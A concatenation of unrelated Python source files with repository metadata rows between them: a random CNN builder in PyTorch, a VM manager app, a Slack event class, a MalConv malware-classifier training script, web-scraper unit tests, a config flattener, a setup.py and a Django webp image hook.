testtensor = fn(testtensor, eval(paeval))
lastsize = testtensor.size()
initlayers.append(eval(self.__get_init_equivalent(fn.__name__, pa)))
fwdlayers.append(self.__get_fwd_equivalent(fn.__name__, lyr))
lyr += 1
if debug == 1:
print(testtensor.size())
elif debug == 1:
print('NetDictionary: Eliminating linear layer - out features > previous layer')
fwdlayers[-1] = 'self.lyrs[' + str(lyr - 1) + '](x)'
return initlayers, fwdlayers
def num_flat_features(self, x):
"""
Calculate number of flat features in a given net layer.
Useful for transitioning between conv and linear layers.
"""
size = x.size()[1:] # all dimensions except the batch dimension
num_features = 1
for s in size:
num_features *= s
return num_features
def __get_init_equivalent(self, funcname, initparams):
"""
Construct eval string from supplied functions and parameters for the
style required in the torch.nn.Module __init__.
"""
return 'nn.' + ''.join([val.capitalize()
for val in funcname.split('_')
]) + '(' + ",".join(tuple(map(str, initparams))) + ')'
def __get_fwd_equivalent(self, funcname, lyrnum):
"""
Construct eval string from supplied functions and parameters for the
style required in the torch.nn.Module forward pass.
"""
if not funcname == 'max_pool2d':
return self.activations[lyrnum] + '(self.lyrs[' + str(lyrnum) + '](x))'
else:
return 'self.lyrs[' + str(lyrnum) + '](x)'
class NetDictionary(dict):
"""
Holds a dictionary of Net with functions to build a model tensor and
random layer and param lists
"""
def __init__(self, network_count, test_tensor, total_labels, import_export_filename, **kwargs):
"""
Initialize a dictionary of randomly structured CNNs to test various network configurations.
args: network_count: number of networks to generate
test_tensor: a tensor that can be used to construct network layers
total_labels: the number of labels being predicted for the networks
import_export_filename: if file exists on initialization, the information in the
file will be used to reconstruct a prior network.
kwargs: optimizers: list of tuples of form (eval strings for optimizer creation, label)
default=[("optim.SGD(d['net'].parameters(), lr=0.0001, momentum=0.9)", "SGD"),
("optim.Adam(d['net'].parameters(), lr=0.0001)", "Adam"),
("optim.Adam(d['net'].parameters(), lr=0.00001)", "Adam1")]
force_rebuild: override import from file and recreate network even if
import_export_filename already exists, false
force_training: imported network training is bypassed if set to false
default=True
conv_layer_activation: activation function used by conv layers
default=F.relu
pooling_probability: approximate fraction of random networks that are assigned
a pooling layer, default = 0.5
first_conv_layer_depth, 4
max_conv_layers, 5
min_conv_layers, 1
max_kernel_size, 7
min_kernel_size, 3
max_out_channels, 12
min_out_channels, 4
linear_layer_activation, F.relu
init_linear_out_features, 1000
linear_feature_deadband, 20
max_layer_divisor, 20
min_layer_divisor, 4
"""
super(NetDictionary, self).__init__()
self.net_count = network_count
self.label_count = total_labels
self.import_export_filename = import_export_filename
self.__test_tensor = test_tensor
self._trained = False
self.force_rebuild = kwargs.get('force_rebuild', False)
self.force_training = kwargs.get('force_training', True)
self.pooling_probability = kwargs.get('pooling_probability', 0.5)
self.init_from_file = os.path.exists(import_export_filename) and not self.force_rebuild
if self.init_from_file and not self.force_rebuild:
self.__import_networks()
else:
self.__build_networks(**kwargs)
def __import_networks(self):
"""
Read layer info and net state dicts from disk.
"""
net_info = torch.load(self.import_export_filename)
self.__options = net_info['options'].copy()
self.optimizers = self.__options['optimizers']
for n_key, n_dict in net_info['state_dicts'].items():
d = dict()
d['net_number'] = net_info['net_numbers'][n_key]
d['func_list'] = net_info['func_lists'][n_key]
d['params'] = net_info['params'][n_key]
d['activations'] = net_info['activations'][n_key]
funcs = [eval(f) for f in d['func_list']]
d['net'] = Net(self.__test_tensor, funcs, d['params'],activations=d['activations'])
d['net'].load_state_dict(n_dict)
d['optimizer_type'] = net_info['optimizer_types'][n_key]
d['criterion'] = nn.BCELoss()
d['optimizer'] = eval([optim[0] for optim in self.optimizers if optim[1] == d['optimizer_type']][0])
d['loss_dictionary'] = net_info['loss_dictionaries'][n_key]
self.__setitem__(n_key, d)
self._trained = True
def __build_networks(self, **kwargs):
"""
build a new set of randomized networks
"""
self.__options = {
'optimizers': kwargs.get('optimizers',
[("optim.SGD(d['net'].parameters(), lr=0.0001, momentum=0.9)",
"SGD"),
("optim.Adam(d['net'].parameters(), lr=0.0001)", "Adam"),
("optim.Adam(d['net'].parameters(), lr=0.00001)", "Adam1"),
]),
'convolution_layer_options': {
'activation' : kwargs.get('conv_layer_activation', 'F.relu'),
'first_layer_depth' : kwargs.get('first_conv_layer_depth', 4),
'max_layers' : kwargs.get('max_conv_layers', 5),
'min_layers' : kwargs.get('min_conv_layers', 1),
'max_kernel_size' : kwargs.get('max_kernel_size', 7),
'min_kernel_size' : kwargs.get('min_kernel_size', 3),
'max_out_channels' : kwargs.get('max_out_channels', 12),
'min_out_channels' : kwargs.get('min_out_channels', 4),
},
'linear_layer_options': {
'activation' : kwargs.get('linear_layer_activation', 'F.relu'),
'init_out_features' : kwargs.get('init_linear_out_features', 1000),
'feature_deadband' : kwargs.get('linear_feature_deadband', 20),
'max_layer_divisor' : kwargs.get('max_layer_divisor', 20),
'min_layer_divisor' : kwargs.get('min_layer_divisor', 4),
},
}
self.optimizers = self.__options['optimizers']
for i in tqdm(range(self.net_count)):
cfs, cps = self.__get_convolution_layers(self.__options['convolution_layer_options'])
lfs, lps = self.__get_linear_layers(self.__options['linear_layer_options'])
funcs = cfs
params = cps
activations = [self.__options['convolution_layer_options']['activation'] for f in cfs]
if (random() < self.pooling_probability):
funcs.extend([F.max_pool2d])
pool_size = np.random.randint(2,4)
activations.extend(['F.relu'])
params.extend([(pool_size, pool_size)])
funcs.extend(lfs)
activations.extend([self.__options['linear_layer_options']['activation'] for f in lfs])
func_list = ['F.' + f.__name__ for f in funcs]
params.extend(lps)
for opt in self.optimizers:
d = dict()
d['net'] = Net(self.__test_tensor, funcs, params, activations=activations)
d['net_number'] = i
d['func_list'] = func_list
d['params'] = params
d['activations'] = activations
d['optimizer_type'] = opt[1]
d['criterion'] = nn.BCELoss()
d['optimizer'] = eval(opt[0])
self.__setitem__(str(i) + '-' + opt[1], d)
def __get_convolution_layers(self, c):
"""
Dynamically create a list of convolution layers. Parameters are used to manage the size,
complexity, and structure of each layer. NEEDS IMPROVEMENT.
"""
fncs, parms = list(),list()
fncs.append(F.conv2d)
parms.append((c['first_layer_depth'],
r_i(c['min_out_channels'], c['max_out_channels'] + 1),
r_i(c['min_kernel_size'], c['max_kernel_size']+1)))
for i in range(r_i(c['min_layers']-1,c['max_layers'])):
fncs.append(F.conv2d)
parms.append((r_i(c['min_out_channels'],c['max_out_channels'] + 1),
r_i(c['min_kernel_size'], c['max_kernel_size']+1)))
return fncs, parms
def __get_linear_layers(self, d):
"""
Dynamically create a list of linear layers.
Parameters are used to manage the size of each layer.
NEEDS IMPROVEMENT.
"""
fncs, parms = list(), list()
fncs.append(F.linear)
parms.append(d['init_out_features'])
nextoutfeatures = int(d['init_out_features']/r_i(d['min_layer_divisor'],
d['max_layer_divisor'] + 1))
while nextoutfeatures > self.label_count + d['feature_deadband']:
fncs.append(F.linear)
parms.append(nextoutfeatures)
nextoutfeatures = int(nextoutfeatures/r_i(d['min_layer_divisor'],
d['max_layer_divisor'] + 1))
fncs.append(F.linear)
parms.append(self.label_count)
return fncs,parms
def train_validate_networks(self, train_data, validation_images, validation_labels, loss_recording_rate):
for k, d in self.items():
net = d['net']
net.to(DEVICE)
net.train()
criterion = d['criterion']
optimizer = d['optimizer']
train_losses = []
validation_losses = []
last_loss = 0.0
running_loss = 0.0
if self.force_training or not self.init_from_file:
pbar = tqdm(enumerate(train_data), total=len(train_data))
for i, data in pbar:
#get the inputs; data is a list of [inputs, labels]
inputs, labels = data
inputs, labels = inputs.to(DEVICE), labels.to(DEVICE)
#zero the parameter gradients
optimizer.zero_grad()
#forward + backward + optimize
outputs = net(inputs)
loss = criterion(outputs, labels)
loss.backward()
optimizer.step()
running_loss += loss.item()
if i % loss_recording_rate == loss_recording_rate - 1:
train_losses.append((i + 1, (running_loss - last_loss)/loss_recording_rate))
pbar.set_description(desc='net name: %s; loss: %.3f' % (k, running_loss/(i + 1)))
pbar.update()
last_loss = running_loss
last_loss = 0.0
valid_loss = 0.0
net.eval()
with torch.no_grad():
pbar = tqdm(enumerate(zip(validation_images,validation_labels)),total=len(validation_labels))
for j, (v_in, v_lab) in pbar:
v_in, v_lab = v_in.to(DEVICE), v_lab.to(DEVICE)
outputs = net(v_in)
loss = criterion(outputs, v_lab)
valid_loss += loss.item()
if j % loss_recording_rate == loss_recording_rate - 1:
validation_losses.append((j + 1, (valid_loss - last_loss)/loss_recording_rate))
last_loss = valid_loss
pbar.set_description(desc='net name: %s; loss: %.3f; validation loss: %.3f'
% (k, running_loss/len(train_data), valid_loss/(j + 1)))
pbar.update()
self[k]['loss_dictionary'] = {'train_losses':train_losses,
'validation_losses': validation_losses,
}
net.cpu()
self._trained = True
def export_networks(self):
"""
Write info required to reconstruct this NetDictionary to disk.
"""
state_dicts = {key : d['net'].state_dict() for key, d in self.items()}
net_numbers = {key : d['net_number'] for key, d in self.items()}
func_lists = {key : d['func_list'] for key, d in self.items()}
params = {key : d['params'] for key, d in self.items()}
activations = {key : d['activations'] for key, d in self.items()}
optimizer_types = {key : d['optimizer_type'] for key, d in self.items()}
loss_dictionaries = {key : d['loss_dictionary'] for key, d in self.items()}
torch.save({'state_dicts':state_dicts,
'net_numbers':net_numbers,
'func_lists':func_lists,
'params':params,
'activations':activations,
'optimizer_types':optimizer_types,
'options':self.__options,
'test_tensor':self.__test_tensor,
'loss_dictionaries':loss_dictionaries,
}, self.import_export_filename)
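# --- usage sketch (editorial addition; file name and tensor shape are assumptions) ---
# Build two random nets per optimizer from a 4-channel test tensor (the channel
# count matches the default first_conv_layer_depth) and inspect the results:
def _example():
    test_input = torch.rand(1, 4, 64, 64)
    nets = NetDictionary(2, test_input, total_labels=3,
                         import_export_filename='nets_demo.pt')
    for name, d in nets.items():
        print(name, d['optimizer_type'], d['func_list'])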
| 48.953368
| 116
| 0.556467
| 2,157
| 18,896
| 4.651368
| 0.164117
| 0.007575
| 0.015947
| 0.009568
| 0.26971
| 0.224559
| 0.1516
| 0.102063
| 0.094488
| 0.08193
| 0
| 0.012007
| 0.338855
| 18,896
| 386
| 117
| 48.953368
| 0.791083
| 0.232536
| 0
| 0.166667
| 0
| 0.003876
| 0.152856
| 0.029101
| 0
| 0
| 0
| 0
| 0
| 1
| 0.050388
| false
| 0
| 0.065891
| 0
| 0.155039
| 0.01938
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c9b7d5c05e7bdbe4c159664bc93dea9d1f8df223
| 1,917
|
py
|
Python
|
src/vmshepherd/app.py
|
DreamLab/VmShepherd
|
f602bb814080d2d3f62c6cb5fa6b9dd685833c24
|
[
"Apache-2.0"
] | 10
|
2018-06-10T17:54:57.000Z
|
2022-02-07T19:37:07.000Z
|
src/vmshepherd/app.py
|
DreamLab/VmShepherd
|
f602bb814080d2d3f62c6cb5fa6b9dd685833c24
|
[
"Apache-2.0"
] | 10
|
2018-06-10T18:46:07.000Z
|
2021-05-13T13:01:22.000Z
|
src/vmshepherd/app.py
|
DreamLab/VmShepherd
|
f602bb814080d2d3f62c6cb5fa6b9dd685833c24
|
[
"Apache-2.0"
] | 3
|
2019-07-18T14:10:10.000Z
|
2022-02-07T19:37:08.000Z
|
import asyncio
import logging
import os
from vmshepherd.drivers import Drivers
from vmshepherd.http import WebServer
from vmshepherd.utils import gen_id, prefix_logging
from vmshepherd.worker import Worker
class VmShepherd:
def __init__(self, config):
self.config = config
self.root_dir = os.path.dirname(__file__)
self.instance_id = gen_id(rnd_length=5)
self.setup_logging()
self.runtime_manager = Drivers.get(
'runtime', self.config['runtime'],
instance_id=self.instance_id
)
self.preset_manager = Drivers.get(
'presets', self.config['presets'],
runtime=self.runtime_manager,
defaults=self.config.get('defaults', {})
)
self.worker = Worker(
runtime=self.runtime_manager, presets=self.preset_manager,
interval=int(self.config.get('worker_interval', 5)),
autostart=self.config.get('autostart', True)
)
http_conf = self.config.get('http', None)
if http_conf:
self.web = WebServer(self, http_conf)
asyncio.ensure_future(self.web.start())
async def run(self, run_once=False):
if run_once:
await self.worker.run_once()
else:
await self.worker.run_forever()
def setup_logging(self):
logger = logging.getLogger()
log_level = self.config.get('log_level', 'info').upper()
logger.setLevel(log_level)
if logger.getEffectiveLevel() == logging.DEBUG:
logging.debug('DEBUG mode enabled')
prefix_logging(self.instance_id)
def reload(self, with_config=None):
self.config = with_config or self.config
self.runtime_manager.reconfigure(self.config.get('runtime'))
self.preset_manager.reconfigure(self.config.get('presets'), self.config.get('defaults'))
Drivers.flush()
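# --- usage sketch (editorial addition; the driver names are hypothetical) ---
# Wiring a config dict through VmShepherd for a single worker pass:
def _example():
    config = {
        'runtime': {'driver': 'DictRuntime'},      # hypothetical driver
        'presets': {'driver': 'DirectoryPreset'},  # hypothetical driver
        'worker_interval': 5,
        'log_level': 'info',
    }
    app = VmShepherd(config)
    asyncio.get_event_loop().run_until_complete(app.run(run_once=True))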
| 32.491525
| 96
| 0.639019
| 226
| 1,917
| 5.238938
| 0.30531
| 0.118243
| 0.087838
| 0.033784
| 0.052365
| 0
| 0
| 0
| 0
| 0
| 0
| 0.001394
| 0.251435
| 1,917
| 58
| 97
| 33.051724
| 0.823693
| 0
| 0
| 0
| 0
| 0
| 0.061033
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.0625
| false
| 0
| 0.145833
| 0
| 0.229167
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c9b84e52e79d954ea22decc10bdcb695a3cc56e1
| 1,762
|
py
|
Python
|
opsdroid/connector/slack/events.py
|
himanshu1root/opsdroid
|
26699c5e7cc014a0d3ab74baf66fbadce939ab73
|
[
"Apache-2.0"
] | 1
|
2020-04-29T20:44:44.000Z
|
2020-04-29T20:44:44.000Z
|
opsdroid/connector/slack/events.py
|
himanshu1root/opsdroid
|
26699c5e7cc014a0d3ab74baf66fbadce939ab73
|
[
"Apache-2.0"
] | 10
|
2019-06-22T11:18:55.000Z
|
2019-09-03T13:26:47.000Z
|
opsdroid/connector/slack/events.py
|
himanshu1root/opsdroid
|
26699c5e7cc014a0d3ab74baf66fbadce939ab73
|
[
"Apache-2.0"
] | 1
|
2019-06-11T22:30:49.000Z
|
2019-06-11T22:30:49.000Z
|
"""Classes to describe different kinds of Slack specific event."""
import json
from opsdroid.events import Message
class Blocks(Message):
"""A blocks object.
Slack uses blocks to add advanced interactivity and formatting to messages.
https://api.slack.com/messaging/interactivity
Blocks are provided in JSON format to Slack which renders them.
Args:
blocks (string or dict): String or dict of json for blocks
room (string, optional): String name of the room or chat channel in
which message was sent
connector (Connector, optional): Connector object used to interact with
given chat service
raw_event (dict, optional): Raw message as provided by chat service.
None by default
Attributes:
created: Local date and time that message object was created
user: String name of user sending message
room: String name of the room or chat channel in which message was sent
connector: Connector object used to interact with given chat service
blocks: Blocks JSON as string
raw_event: Raw message provided by chat service
raw_match: A match object for a search against which the message was
matched. E.g. a regular expression or natural language intent
responded_to: Boolean initialized as False. True if event has been
responded to
"""
def __init__(self, blocks, *args, **kwargs):
"""Create object with minimum properties."""
super().__init__("", *args, **kwargs)
self.blocks = blocks
if isinstance(self.blocks, list):
self.blocks = json.dumps(self.blocks)
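# --- usage sketch (editorial addition) ---
# A Blocks event built from Block Kit dicts; the list is serialized to a JSON
# string on construction, so it round-trips through json.loads():
def _example_blocks():
    event = Blocks([{"type": "section",
                     "text": {"type": "mrkdwn", "text": "*Hello* world"}}])
    assert isinstance(event.blocks, str)
    return json.loads(event.blocks)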
| 39.155556
| 79
| 0.648127
| 224
| 1,762
| 5.044643
| 0.441964
| 0.044248
| 0.031858
| 0.026549
| 0.204425
| 0.204425
| 0.204425
| 0.204425
| 0.204425
| 0.125664
| 0
| 0
| 0.296254
| 1,762
| 44
| 80
| 40.045455
| 0.91129
| 0.76277
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.125
| false
| 0
| 0.25
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c9b95e3837c6ec2e9141c7cfae3e53054b21d5b5
| 3,449
|
py
|
Python
|
src/train.py
|
SYHPARK/MalConv-keras
|
2b68ba82e2201290130bed6d58f5725b17a87867
|
[
"MIT"
] | null | null | null |
src/train.py
|
SYHPARK/MalConv-keras
|
2b68ba82e2201290130bed6d58f5725b17a87867
|
[
"MIT"
] | null | null | null |
src/train.py
|
SYHPARK/MalConv-keras
|
2b68ba82e2201290130bed6d58f5725b17a87867
|
[
"MIT"
] | null | null | null |
from os.path import join
import argparse
import pickle
import warnings
import pandas as pd
from keras.callbacks import ModelCheckpoint, EarlyStopping
from keras.models import load_model
import utils
from malconv import Malconv
from preprocess import preprocess
warnings.filterwarnings("ignore")
parser = argparse.ArgumentParser(description='Malconv-keras classifier training')
parser.add_argument('--batch_size', type=int, default=64)
parser.add_argument('--verbose', type=int, default=1)
parser.add_argument('--epochs', type=int, default=100)
parser.add_argument('--limit', type=float, default=0., help="limit gpu memory percentage")
parser.add_argument('--max_len', type=int, default=200000, help="model input length")
parser.add_argument('--win_size', type=int, default=500)
parser.add_argument('--val_size', type=float, default=0.1, help="validation percentage")
parser.add_argument('--save_path', type=str, default='../saved/', help='Directory to save model and log')
parser.add_argument('--model_path', type=str, default='../saved/malconv.h5', help="model to resume")
parser.add_argument('--save_best', action='store_true', help="Save model with best validation accuracy")
parser.add_argument('--resume', action='store_true')
parser.add_argument('csv', type=str)
def train(model, max_len=200000, batch_size=64, verbose=True, epochs=100, save_path='../saved/', save_best=True):
# callbacks
ear = EarlyStopping(monitor='val_acc', patience=5)
mcp = ModelCheckpoint(join(save_path, 'malconv.h5'),
monitor="val_acc",
save_best_only=save_best,
save_weights_only=False)
print("[*] x_train length: ", len(x_train))
print("[*] y_train length: ", len(y_train))
print("[*] x_test length: ", len(x_test))
print("[*] y_test length: ", len(y_test))
validation_data = utils.data_generator(x_test, y_test, max_len, batch_size)  # debug only; fit_generator builds its own below
print("[*] validation_data: ", validation_data)
history = model.fit_generator(
utils.data_generator(x_train, y_train, max_len, batch_size, shuffle=True),
steps_per_epoch=len(x_train)//batch_size + 1,
epochs=epochs,
verbose=verbose,
callbacks=[ear, mcp],
validation_data=utils.data_generator(x_test, y_test, max_len, batch_size),
validation_steps=len(x_test)//batch_size + 1)
return history
if __name__ == '__main__':
args = parser.parse_args()
# limit gpu memory
if args.limit > 0:
utils.limit_gpu_memory(args.limit)
print("[*] Flag0")
# prepare model
if args.resume:
model = load_model(args.model_path)
else:
model = Malconv(args.max_len, args.win_size)
model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['acc'])
print("[*] Flag1")
# prepare data
# preprocess is handled in utils.data_generator
df = pd.read_csv(args.csv, header=None)
data, label = df[0].values, df[1].values
x_train, x_test, y_train, y_test = utils.train_test_split(data, label, args.val_size)
print('Train on %d data, test on %d data' % (len(x_train), len(x_test)))
print("[*] Flag2")
history = train(model, args.max_len, args.batch_size, args.verbose, args.epochs, args.save_path, args.save_best)
print("[*] Flag3")
with open(join(args.save_path, 'history.pkl'), 'wb') as f:
pickle.dump(history.history, f)
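# --- input format sketch (editorial addition; the paths are hypothetical) ---
# The positional csv argument is read with header=None above: column 0 holds
# the sample path, column 1 the binary label. Writing a two-row example:
def _write_example_csv(path='train_example.csv'):
    pd.DataFrame([('data/benign.exe', 0), ('data/malware.exe', 1)]
                 ).to_csv(path, header=False, index=False)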
| 40.104651
| 116
| 0.684836
| 477
| 3,449
| 4.740042
| 0.278826
| 0.047766
| 0.090226
| 0.02521
| 0.070765
| 0.05042
| 0.05042
| 0.05042
| 0.05042
| 0.05042
| 0
| 0.014396
| 0.174253
| 3,449
| 85
| 117
| 40.576471
| 0.779494
| 0.028704
| 0
| 0
| 0
| 0
| 0.178582
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.015385
| false
| 0
| 0.153846
| 0
| 0.184615
| 0.153846
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c9bc28a5d5d38a212f5e0f03eba96a2a3f217595
| 1,870
|
py
|
Python
|
unittesting.py
|
slobbishbody/routegetter
|
b6c279c1734530fd2aec08da9317575b66150092
|
[
"MIT"
] | null | null | null |
unittesting.py
|
slobbishbody/routegetter
|
b6c279c1734530fd2aec08da9317575b66150092
|
[
"MIT"
] | null | null | null |
unittesting.py
|
slobbishbody/routegetter
|
b6c279c1734530fd2aec08da9317575b66150092
|
[
"MIT"
] | null | null | null |
'''We will test all routegetter methods in this test suite'''
from os.path import join, abspath, dirname
import unittest
import logging
import routesparser
from faker import Faker
LOG_FILE = join(dirname(abspath(__file__)), 'log', 'testing', 'testing.log')
class RoutesGetterTests(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.log = logging.getLogger('RouteGetterTests')
cls.log.setLevel(logging.DEBUG)
cls.routegetter = routesparser.RouteGetter(url='http://www.cyride.com/index.aspx'
, payload={'page':1212})
cls.data_generator = Faker()
def setUp(self):
self.bad_url = self.data_generator.url()
def test_cyride_request(self):
'''we want to test that our request succeeds at cyride'''
log = self.log.getChild('test_cyride_request')
request = self.routegetter.request
self.assertNotEqual(request.status_code, 404)
log.debug('%s, %s', request.url, request)
@unittest.expectedFailure
def test_bad_url(self):
log = self.log.getChild('test_bad_url')
request = routesparser.get_request(self.bad_url)
self.assertEqual(request.status_code, 404)
log.debug('%s, %s', request.url, request)
class RoutesParserTests(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.log = logging.getLogger('RouteParserTests')
cls.log.setLevel(logging.DEBUG)
cls.routeparser = routesparser.RouteParser()
def test_souped_data(self):
log = self.log.getChild('test_souped_data')
pretty_html = self.routeparser.pretty_html
self.assertIsNotNone(self.routeparser.pretty_html)
log.info(pretty_html.title.string)
if __name__ == '__main__':
logging.basicConfig(filename=LOG_FILE, filemode='w')
unittest.main()
| 33.392857
| 93
| 0.673797
| 222
| 1,870
| 5.509009
| 0.378378
| 0.028618
| 0.02453
| 0.044154
| 0.260016
| 0.242028
| 0.106296
| 0.106296
| 0.106296
| 0.106296
| 0
| 0.007458
| 0.21123
| 1,870
| 55
| 94
| 34
| 0.821695
| 0.057219
| 0
| 0.146341
| 0
| 0
| 0.086187
| 0
| 0
| 0
| 0
| 0
| 0.073171
| 1
| 0.146341
| false
| 0
| 0.121951
| 0
| 0.317073
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c9bc5072826fedfaeb9d7bc762e8a4e79ddf3354
| 961
|
py
|
Python
|
side8/k8s/operator/utils.py
|
side8/k8s-operator
|
4097d91c39596993fcd21c2e9158796f83f7ea6f
|
[
"Apache-2.0"
] | 29
|
2017-12-12T04:51:47.000Z
|
2021-12-16T13:33:30.000Z
|
side8/k8s/operator/utils.py
|
side8/k8s-operator
|
4097d91c39596993fcd21c2e9158796f83f7ea6f
|
[
"Apache-2.0"
] | 18
|
2017-11-16T17:57:59.000Z
|
2018-01-30T11:05:29.000Z
|
side8/k8s/operator/utils.py
|
side8/k8s-operator
|
4097d91c39596993fcd21c2e9158796f83f7ea6f
|
[
"Apache-2.0"
] | 6
|
2018-10-01T16:37:45.000Z
|
2021-05-07T02:34:44.000Z
|
def parse(o, prefix=""):
def flatten(lis):
new_lis = []
for item in lis:
if isinstance(item, list):
new_lis.extend(flatten(item))
else:
new_lis.append(item)
return new_lis
try:
return {
"str": lambda: (prefix, o),
"int": lambda: parse(str(o), prefix=prefix),
"float": lambda: parse(str(o), prefix=prefix),
"bool": lambda: parse(1 if o else 0, prefix=prefix),
"NoneType": lambda: parse("", prefix=prefix),
"list": lambda: flatten([parse(io, "{}{}{}".format(prefix, "_" if prefix else "", ik).upper()) for ik, io in enumerate(o)]),
"dict": lambda: flatten([parse(io, "{}{}{}".format(prefix, "_" if prefix else "", ik).upper()) for ik, io in o.items()]),
}[type(o).__name__]()
except KeyError:
raise ValueError("type '{}' not supported".format(type(o).__name__))
| 41.782609
| 136
| 0.522373
| 115
| 961
| 4.243478
| 0.356522
| 0.04918
| 0.057377
| 0.061475
| 0.356557
| 0.356557
| 0.245902
| 0.245902
| 0.245902
| 0.245902
| 0
| 0.002963
| 0.297607
| 961
| 22
| 137
| 43.681818
| 0.72
| 0
| 0
| 0
| 0
| 0
| 0.07076
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.095238
| false
| 0
| 0
| 0
| 0.190476
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c9bca9a508473ab1f3f0748890578a6eb5bddb04
| 710
|
py
|
Python
|
setup.py
|
thetongs/hello_world
|
5c2ab413cd104ed6d8a5640ee6fd3476d0f1e846
|
[
"MIT"
] | null | null | null |
setup.py
|
thetongs/hello_world
|
5c2ab413cd104ed6d8a5640ee6fd3476d0f1e846
|
[
"MIT"
] | null | null | null |
setup.py
|
thetongs/hello_world
|
5c2ab413cd104ed6d8a5640ee6fd3476d0f1e846
|
[
"MIT"
] | null | null | null |
from setuptools import setup
VERSION = '0.0.4'
DESCRIPTION = 'Hello world checking'
# Setting up
setup(
name="hello_world",
version=VERSION,
author="Kishan Tongrao",
author_email="kishan.tongs@gmail.com",
description=DESCRIPTION,
long_description_content_type="text/markdown",
packages=['hello_world'],
include_package_data=True,
install_requires=[],
classifiers=[
"Development Status :: 1 - Planning",
"Intended Audience :: Developers",
"Programming Language :: Python :: 3",
"Operating System :: Unix",
"Operating System :: MacOS :: MacOS X",
"Operating System :: Microsoft :: Windows",
]
)
| 28.4
| 52
| 0.625352
| 70
| 710
| 6.214286
| 0.742857
| 0.068966
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.009416
| 0.252113
| 710
| 25
| 53
| 28.4
| 0.809793
| 0.014085
| 0
| 0
| 0
| 0
| 0.438519
| 0.032593
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.045455
| 0
| 0.045455
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c9c93db3dbc0d8e8af8b81d596af15d7ca55058b
| 2,228
|
py
|
Python
|
src/cms/medias/hooks.py
|
UniversitaDellaCalabria/uniCMS
|
b0af4e1a767867f0a9b3c135a5c84587e713cb71
|
[
"Apache-2.0"
] | 6
|
2021-01-26T17:22:53.000Z
|
2022-02-15T10:09:03.000Z
|
src/cms/medias/hooks.py
|
UniversitaDellaCalabria/uniCMS
|
b0af4e1a767867f0a9b3c135a5c84587e713cb71
|
[
"Apache-2.0"
] | 5
|
2020-12-24T14:29:23.000Z
|
2021-08-10T10:32:18.000Z
|
src/cms/medias/hooks.py
|
UniversitaDellaCalabria/uniCMS
|
b0af4e1a767867f0a9b3c135a5c84587e713cb71
|
[
"Apache-2.0"
] | 2
|
2020-12-24T14:13:39.000Z
|
2020-12-30T16:48:52.000Z
|
import logging
import magic
import os
from cms.medias.utils import get_file_type_size
from django.conf import settings
from django.core.files.uploadedfile import InMemoryUploadedFile
from . import settings as app_settings
from . utils import to_webp
logger = logging.getLogger(__name__)
FILETYPE_IMAGE = getattr(settings, 'FILETYPE_IMAGE',
app_settings.FILETYPE_IMAGE)
def set_file_meta(media_object):
data = get_file_type_size(media_object)
media_object.file_size = data['file_size']
media_object.file_type = data['mime_type']
def webp_image_optimizer(media_object):
for field_name in ('file', 'image'):
field = getattr(media_object, field_name, None)
if field:
break
if not getattr(field, '_file', None): # pragma: no cover
return
mimetype = magic.Magic(mime=True).from_buffer(field._file.file.read())
if mimetype in FILETYPE_IMAGE:
field._file.seek(0)
byte_io = to_webp(field._file)
byte_io.seek(0, os.SEEK_END)
content_size = byte_io.tell()
byte_io.seek(0)
fname = '.'.join(field.name.split('.')[:-1]) + '.webp'
field._file = InMemoryUploadedFile(file = byte_io,
name = fname,
content_type = 'image/webp',
size = content_size,
charset='utf-8',
field_name = field_name)
field._file._name = fname
field.name = fname
field._file.size = content_size
field._file.content_type = 'image/webp'
# if they are valuable ... otherwise nothing happens to the model
media_object.file_size = content_size
media_object.file_type = 'image/webp'
